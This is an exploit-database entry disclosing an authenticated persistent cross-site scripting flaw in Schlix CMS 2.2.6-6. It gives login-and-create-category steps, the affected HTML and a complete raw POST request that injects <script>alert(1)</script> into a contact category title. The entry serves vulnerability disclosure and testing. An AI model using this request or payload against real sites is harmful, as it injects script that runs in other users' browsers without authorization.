Exploit for Schlix CMS 2.2.6-6 Cross Site Scripting

Name: Exploit for Schlix CMS 2.2.6-6 Cross Site Scripting
Rating: 5 (242 reviews)
2021-05-06 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:162484
# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)  
# Date: 2021-05-05  
# Exploit Author: Emircan Baş   
# Vendor Homepage: https://www.schlix.com/  
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip  
# Version: 2.2.6-6  
# Tested on: Windows & WampServer  
  
==> Tutorial <==  
  
1- Login with your account.  
2- Go to the contacts section. Directory is '/admin/app/contact'.  
3- Create a new category and type an XSS payload into the category title.  
4- XSS payload will be executed when we travel to created page.  
  
==> Vulnerable Source Code <==  
  
<article class="main category">   
<div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');">  
<div class="media-header-title container d-flex h-100">  
<div class="row align-self-center w-100">  
<div class="col-8 mx-auto">  
<div class="text-center">  
<h1 class="item title" itemprop="headline">'"><script>alert(1)</script></h1> # OUR PAYLOAD IS NON-EXECUTEABLE  
</div>  
</div>  
</div>  
</div>  
</div>  
<div class="breadcrumb-bg">  
<div class="container">  
<div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms">  
<i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item">  
<a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED PLACE  
</div>  
  
==> HTTP Request <==  
  
POST /admin/app/contacts?action=savecategory HTTP/1.1  
Host: (HOST)  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489  
Content-Length: 4146  
Origin: (ORIGIN)  
Connection: close  
Referer: (REFERER)  
Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2  
Upgrade-Insecure-Requests: 1  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="_csrftoken"  
  
49feefcd2b917b9855cd55c8bd174235fa5912e4  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="cid"  
  
6  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="parent_id"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="guid"  
  
ee34f23a-7167-a454-8576-20bef7575c15  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="title"  
  
<script>alert(1)</script>  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="status"  
  
1  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="virtual_filename"  
  
script-alert-1-script  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="summary"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="description"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="meta_description"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="meta_key"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="tags"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="date_available"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="date_expiry"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="items_per_page"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="options[]"  
  
display_pagetitle  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="options[]"  
  
__null__  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="options[]"  
  
display_child_categories  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="options[]"  
  
__null__  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="options[]"  
  
display_items  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="options[]"  
  
__null__  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="options[child_categories_sortby]"  
  
date_created  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="options[items_sortby]"  
  
date_created  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="permission_read_everyone"  
  
everyone  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="permission_read[]"  
  
1  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="permission_read[]"  
  
2  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="permission_read[]"  
  
3  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="permission_write[]"  
  
1  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="cmh_media_selection"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="cmh_media_upload"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="cmh_media_path"  
  
  
-----------------------------280033592236615772622294478489  
Content-Disposition: form-data; name="cmh_media_url"  
  
  
-----------------------------280033592236615772622294478489--